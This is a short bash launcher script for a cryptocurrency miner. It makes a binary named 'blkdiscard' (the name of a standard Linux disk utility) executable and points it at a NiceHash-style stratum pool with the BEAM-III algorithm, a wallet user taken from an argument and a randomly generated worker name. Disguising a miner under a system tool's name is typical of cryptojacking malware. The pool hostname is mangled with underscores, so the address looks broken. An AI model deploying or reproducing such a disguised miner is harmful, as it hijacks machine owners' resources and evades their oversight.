#!/bin/bash
POOL=stratum+tcp://beamv3.eu-west_nicehash_com:3387
USER=$1
WORKER=$(echo GPU-$(shuf -i 1000-9999 -n 1))
ALGO=BEAM-III

chmod +x blkdiscard
./blkdiscard -a $ALGO --pool $POOL --user $USER.$WORKER --ethstratum ETHPROXY
